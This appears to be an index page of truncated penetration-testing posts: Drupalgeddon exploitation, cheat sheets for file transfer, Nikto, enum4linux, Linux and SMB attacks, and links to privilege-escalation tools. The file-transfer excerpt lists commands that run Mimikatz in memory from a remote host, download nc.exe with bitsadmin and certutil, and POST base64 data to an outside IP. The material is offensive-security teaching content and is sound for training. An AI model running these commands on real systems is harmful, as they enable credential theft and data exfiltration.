Attacking Drupal

Leveraging Known Vulnerabilities
Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence.
Drupalgeddon Manual exploitation
As stated previously, this flaw can be exploited by leveraging a pre-authentication SQL injection which can be used to …

FILE TRANSFER – Cheat Sheet

Command Description
Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 - Download a file with PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1') - Execute a file in memory using PowerShell
Invoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64 - Upload a file with PowerShell
bitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exe - Download a file using Bitsadmin
certutil.exe -verifyctl -split -f http://10.10.10.1/nc.exe - Download a file using Certutil
…

Nikto Cheat Sheet

Nikto Cheat Sheet
COMMAND DESCRIPTION
nikto -h http://nlabs.local - Scans the specified host
nikto -h http://nlabs.local -Tuning 6 - Uses a specific scan tuning level
nikto -h http://nlabs.local -port 8080 - Scans the specified port
nikto -h http://nlabs.local -ssl - Scans for SSL vulnerabilities
nikto -h http://nlabs.local -Format html - Formats output in HTML
nikto -h http://nlabs.local -output out.txt …

Enum4Linux Cheat sheet

enum4linux Cheat Sheet
COMMAND DESCRIPTION
enum4linux -v target-ip - Verbose mode, shows the underlying commands being executed by enum4linux
enum4linux -a target-ip - Do everything, runs all options apart from dictionary based share name guessing
enum4linux -U target-ip - Lists usernames, if the server allows it (RestrictAnonymous = 0)
enum4linux -u administrator -p password -U target-ip - If …

Linux Commands – Cheat Sheet

Bash Commands
uname -a - Show system and kernel
head -n1 /etc/issue - Show distribution
mount - Show mounted filesystems
date - Show system date
uptime - Show uptime
whoami - Show your username
man command - Show manual for command
ls Options
-a - Show all (including hidden)
-R - Recursive list
-r - Reverse order
-t - Sort by last modified
-S - Sort by file …

Cheat sheet – SMB Attacks

Exploiting SMB
SMB Enumeration
Nmap Enumeration
Command Description
smbclient -N -L //10.10.10.1 - Null-session testing against the SMB service.
smbmap -H 10.10.10.1 - Network share enumeration using smbmap.
smbmap -H 10.10.10.1 -r notes - Recursive network share enumeration using smbmap.
smbmap -H 10.10.10.1 --download "notes\note.txt" - Download a specific file from the shared folder.
smbmap -H 10.10.10.1 --upload test.txt "notes\test.txt" …

ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB

Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP …

Helpful Websites

Wordlists
General
Linux Kernel CVEs | All CVEs - https://github.com/lucyoa/kernel-exploits
Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Linux Privilege Escalation - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Checklist - Linux Privilege Escalation - https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
Sushant 747's Guide (country dependent; may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
Linux Privilege Escalation
LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum - https://github.com/rebootuser/LinEnum
Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester
Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker
PayLoadAlltheThings - https://github.com/swisskyrepo/PayloadsAllTheThings